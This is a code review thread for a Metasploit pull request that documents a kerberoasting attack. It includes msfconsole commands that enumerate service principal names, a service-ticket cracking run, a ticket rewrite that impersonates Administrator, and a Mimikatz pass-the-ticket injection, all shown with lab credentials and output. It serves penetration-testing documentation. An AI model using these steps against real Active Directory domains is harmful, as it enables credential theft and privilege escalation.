### PR TITLE
Add kerberoasting documentation

### PR DESCRIPTION
**Pull request by jheysel-r7**
Please let me know if this is the correct spot for this documentation. I mention this because there's no `kerberoasting.rb` module, this just describes the steps to preform a kerberoasting attack using metasploit. Due to this `msftidy.rb` gives the following error:
`documentation/modules/auxiliary/admin/kerberos/kerberoasting.md - [ERROR] Doc missing module. Check file name and path(s) are correct. Doc: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md`

### CODE REVIEW

**Comment by gwillcox-r7** [comment]
This needs rebasing against `master` to bring in latest changes.

File: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md [hunk 1]
```diff
@@ -0,0 +1,227 @@
+## Vulnerable Application
+
+Any system leveraging kerberos as a means of authentication e.g. Active Directory, MSSQL
+
+## Verification Steps
+
+1. Start msfconsole
+3. Obtain SPNs from your target
+	1. Do: `use auxiliary/gather/ldap_query`
```
Comment (adfoster-r7) [inline documentation/modules/auxiliary/admin/kerberos/kerberoasting.md:9]: Are there any benefits/differences/trade-offs in using the ldap_query module directly, versus using the `modules/auxiliary/gather/get_user_spns` module? 👀

File: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md [hunk 2]
```diff
@@ -0,0 +1,227 @@
...
+
+### Rewrite Service Tickets & RAM Injection
+
+Kerberos tickets are signed with the NTLM hash of the password. If the ticket hash has been cracked then it is possible
+to rewrite the ticket with [Kerberoast](https://github.com/nidem/kerberoast) python script. This tactic will allow to
+impersonate any domain user or a fake account when the service is going to be accessed. Additionally privilege
+escalation is also possible as the user can be added into an elevated group such as Domain Admins.
+
+```
+➜  kerberoast git:(master) ✗ python3  kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500
```
Comment (adfoster-r7) [inline documentation/modules/auxiliary/admin/kerberos/kerberoasting.md:218]: cc @dwelch-r7 - any thoughts on adding this ram injection support to the forge_ticket module?

File: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md (hunk 1 above)
Comment (jheysel-r7) [reply documentation/modules/auxiliary/admin/kerberos/kerberoasting.md:9]: Oh sweet, I didn't know that module existed. Probably best we direct users to the specific `get_user_spns` module :)

File: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md [hunk 3]
```diff
@@ -0,0 +1,227 @@
...
+====================
+
+   * Saved to file     : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi
+```
+
+
+### Crack Service Tickets
+
+To crack the service ticket a number of tools can be used. In this example we'll use a python
+script **tgsrepcrack** is part of [Tim Medin](https://twitter.com/TimMedin) [Kerberoast](https://github.com/nidem/kerberoast) toolkit
```
[the remark this answers is not in the document]
Comment (jheysel-r7) [reply documentation/modules/auxiliary/admin/kerberos/kerberoasting.md:201]: I think that's a great idea 👍

File: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md [hunk 4]
```diff
@@ -0,0 +1,227 @@
...
+➜  kerberoast git:(master) ✗ python3 tgsrepcrack.py passlist.txt 1-40a10000-Administrator@HTTP\~testService-EXAMPLE.COM.kirbi
+Cracking 1 tickets...
+found password for ticket 0: N0tpassword!  File: 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi
+Successfully cracked all tickets
+```
+
+### Rewrite Service Tickets & RAM Injection
+
+Kerberos tickets are signed with the NTLM hash of the password. If the ticket hash has been cracked then it is possible
+to rewrite the ticket with [Kerberoast](https://github.com/nidem/kerberoast) python script. This tactic will allow to
```
Comment (dwelch-r7) [inline documentation/modules/auxiliary/admin/kerberos/kerberoasting.md:213]: > This tactic will allow to
I think you accidentally a word here

File: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md (hunk 1 above)
Comment (jheysel-r7) [reply documentation/modules/auxiliary/admin/kerberos/kerberoasting.md:9]: @adfoster-r7 `get_user_spns` does seem like the more obvious module to direct users to, although after running a quick test the `ldap_query` module seems to work a bit better (I could be the messing something up) - it also doesn't require the user to input the domain which is nice
```
msfuser@ubuntu:~/git/metasploit-framework$ ./msfconsole -q -x 'use auxiliary/gather/get_user_spns; set rhosts 172.16.199.235; set user DARWIN_CLAY; set pass N0tpassword!; set domain example.com; run'
rhosts => 172.16.199.235
user => DARWIN_CLAY
pass => N0tpassword!
domain => example.com
[*] Running for 172.16.199.235...
[*] Total of records returned 52
[*] No entries found!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

```
msfuser@ubuntu:~/git/metasploit-framework$ ./msfconsole -q -x 'use auxiliary/gather/ldap_query; set rhosts 172.16.199.235; set BIND_DN  DARWIN_CLAY; set BIND_PW N0tpassword!; set action ENUM_USER_SPNS_KERBEROAST; run'
rhosts => 172.16.199.235
BIND_DN => DARWIN_CLAY
BIND_PW => N0tpassword!
action => ENUM_USER_SPNS_KERBEROAST
[*] Running module against 172.16.199.235
[*] Discovering base DN automatically
[+] 172.16.199.235:389 Discovered base DN: DC=example,DC=com
CN=SHIRLEY_KRAMER OU=Staging OU=Admin DC=example DC=com
=======================================================

 Name                  Attributes
 ----                  ----------
 cn                    SHIRLEY_KRAMER
 samaccountname        SHIRLEY_KRAMER
 serviceprincipalname  CIFS/AWSWWKS1000001

CN=FLORENCE_MOSS OU=Devices OU=OGC OU=Stage DC=example DC=com
=========================================

 Name                  Attributes
 ----                  ----------
 cn                    example.com
 samaccountname        example.com
 serviceprincipalname  http/testService || HTTP/WIN-FDV8QFUMFP7 || HOST/WIN-FDV8QFUMFP7@example.com || HTTP/WIN-FDV8QFUMFP7@example
                       .com

CN=ROMAN_ODONNELL OU=Devices OU=AWS OU=Tier 2 DC=example DC=com
===============================================================
```

**Comment by adfoster-r7** [comment]
## Release Notes

Adds Kerberoasting documentation

File: docs/metasploit-framework.wiki/kerberoasting.md [hunk 5]
```diff
@@ -0,0 +1,332 @@
...
+	1. Do:  `python3  kerberoast.py -p N0tpassword!
+	    -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500`
+8. Finally inject the ticket back into RAM using meterpreter's kiwi extension
+	1. `meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi`
+
+## Kerberoasting
+
+Kerberoasting is a post-exploitation technique that tries to crack the password of a service acount withtin Active
+Directory. The attacker requests a ticket while pretending to be an account user with a service principal name (SPN),
+which contains an encrypted password. Once recieved, the attacker attemps to crack the password hash.
```
Comment (adfoster-r7) [inline docs/metasploit-framework.wiki/kerberoasting.md:30]: > which contains an encrypted password

Portions of the service ticket are encrypted with a secret key - the service account's password. If a weak password has been used it's possible to use a brute force attack to identify the service account's password.

i.e. the ticket doesn't contain the encrypted password, the ticket is encrypted using the password

Comment (adfoster-r7) [reply docs/metasploit-framework.wiki/kerberoasting.md:30]: Nothing actionable from these comments, just posting them for visibility - will tweak the docs in a different PR :+1:

File: documentation/modules/auxiliary/admin/kerberos/kerberoasting.md (hunk 1 above)
Comment (adfoster-r7) [reply documentation/modules/auxiliary/admin/kerberos/kerberoasting.md]: I've updated this module now - https://github.com/rapid7/metasploit-framework/pull/17490

**Pull request merged**